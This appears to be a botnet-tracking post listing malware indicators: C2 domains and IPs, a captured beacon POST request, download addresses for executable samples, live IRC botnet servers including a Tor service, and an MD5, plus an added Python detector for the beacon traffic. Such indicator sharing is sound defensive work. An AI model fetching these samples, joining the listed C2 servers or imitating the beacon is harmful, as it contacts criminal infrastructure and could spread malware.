jdsiwiqweiqwyreqwi.com (Phishing malware hosted in Bosnia and Herzegovina, Banja Luka, Blicnet D.o.o.)

Domains used by the malware:

34324325kgkgfkgf.com
dsffdsk323721372131.com
fdshjfsh324332432.com
jdsiwiqweiqwyreqwi.com 80.242.123.208

HTTP Requests:

URI:
http://jdsiwiqweiqwyreqwi.com/dffgbDFGvf465/YYf.php

DATA:
POST /dffgbDFGvf465/YYf.php HTTP/1.0
Host: jdsiwiqweiqwyreqwi.com
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 272
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
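As an added detection example (not part of the original post), the following Python parses a raw request header block and reports which traits of the beacon above it matches: a Host in the listed C2 domains, a binary POST to a .php path, the non-standard Content-Encoding: binary header, and an HTTP/1.0 request carrying the hard-coded MSIE 6.0 / Windows XP User-Agent. The request text embedded in it is a constructed copy of the one shown here, headers only.

```python
import re

# Indicators listed in the post
C2_DOMAINS = {"34324325kgkgfkgf.com", "dsffdsk323721372131.com",
              "fdshjfsh324332432.com", "jdsiwiqweiqwyreqwi.com"}
# The sample's hard-coded User-Agent: MSIE 6.0 on Windows XP (NT 5.1)
BEACON_UA = re.compile(r"^Mozilla/4\.0 \(compatible; MSIE 6\.0; Windows NT 5\.1;")

def parse_request(raw):
    """Split a raw HTTP request header block into (method, path, version, headers)."""
    lines = raw.strip().splitlines()
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():          # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, version, headers

def beacon_reasons(raw):
    """Return the indicators a request matches; an empty list means no match."""
    method, path, version, h = parse_request(raw)
    reasons = []
    if h.get("host", "").lower() in C2_DOMAINS:
        reasons.append("host is a listed C2 domain")
    if method == "POST" and path.endswith(".php") and \
            h.get("content-type") == "application/octet-stream":
        reasons.append("binary POST to a .php endpoint")
    if h.get("content-encoding", "").lower() == "binary":
        reasons.append("non-standard Content-Encoding: binary")
    if version == "HTTP/1.0" and BEACON_UA.search(h.get("user-agent", "")):
        reasons.append("HTTP/1.0 with the sample's MSIE 6.0 User-Agent")
    return reasons

# Constructed copy of the beacon shown in the post (headers only, body omitted)
SAMPLE_REQUEST = """POST /dffgbDFGvf465/YYf.php HTTP/1.0
Host: jdsiwiqweiqwyreqwi.com
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 272
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
"""

if __name__ == "__main__":
    print(beacon_reasons(SAMPLE_REQUEST))
```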

Samples:
80.242.123.211:888/darky.exe
80.242.123.211:888/1.exe
80.242.123.211:888/run.exe

Hosting infos:
http://whois.domaintools.com/80.242.123.208

89.248.172.240 (30k botnet hosted in the Netherlands, Amsterdam, Ecatel Ltd)

Botnet found by sPy.

Only the server and port are listed here, no channels, because there was no exe file to examine for more detail.
Feel free to check for channels yourself.

Connecting to 89.248.172.240 (6667)

Invisible Users 12: 12 3554
Operators: 2 operator(s) online
Channels: 12 channels formed
Clients: I have 3555 clients and 0 servers
Local users: 3555 29989 Current local users 3555, max 29989
Global users: 3555 15450 Current global users 3555, max 15450

Hosting infos:
http://whois.domaintools.com/89.248.172.240

Linux Botnet Hosted In blackunix.us

This is the bot used to scan for vulnerabilities:
hxxp://pastebin.com/dEMULiQV

Now talking in #botnets
Topic On : [ #botnets ] [ hajar irc.predone.cz dan irc.drogs.pl ]
Topic By : [ uyap ]
Modes On : [ #botnets ] [ +smntrMuk fcuked ]

The Bot is hosted here hxxp://visionafricamagazine.com/scripts/x.log

onetimes27s.com (Reverse DNS bot hosted in the Russian Federation, Saint Petersburg, Majordomo Llc)

This package was posted on a hacking board as an HTTP bot.
After checking the file, here are the results:

Domains used:

hoseen454r.com (inactive)
onetimes27s.com (active)

Resolved : [ onetimes27s.com ] To [ 178.250.245.186 ]

Panel:
hxxp://178.250.245.186/pref1/ (password protected)

Sample here

Hosting infos:
http://whois.domaintools.com/178.250.245.186

gki2mpdt3rsokbmv.onion (IRC botnet hosted on a Tor hidden service)

Server:  gki2mpdt3rsokbmv.onion
Port:  6667
Channel:  #channel

Oper:
[wac] (wac@9bedb2.host): ac
[wac] #channel
[wac] lair.hell.net :Cerberus Server
[wac] idle 00:00:18, signon: Tue May 13 18:24:47
[wac] End of WHOIS list.

The owner must have used very old bot code to create this, as it fails to work properly on Windows 7 and higher.

Related MD5s (download sample from Malwr.com):
Ircbot: c94783e10995197f9177e6c72ae53e6a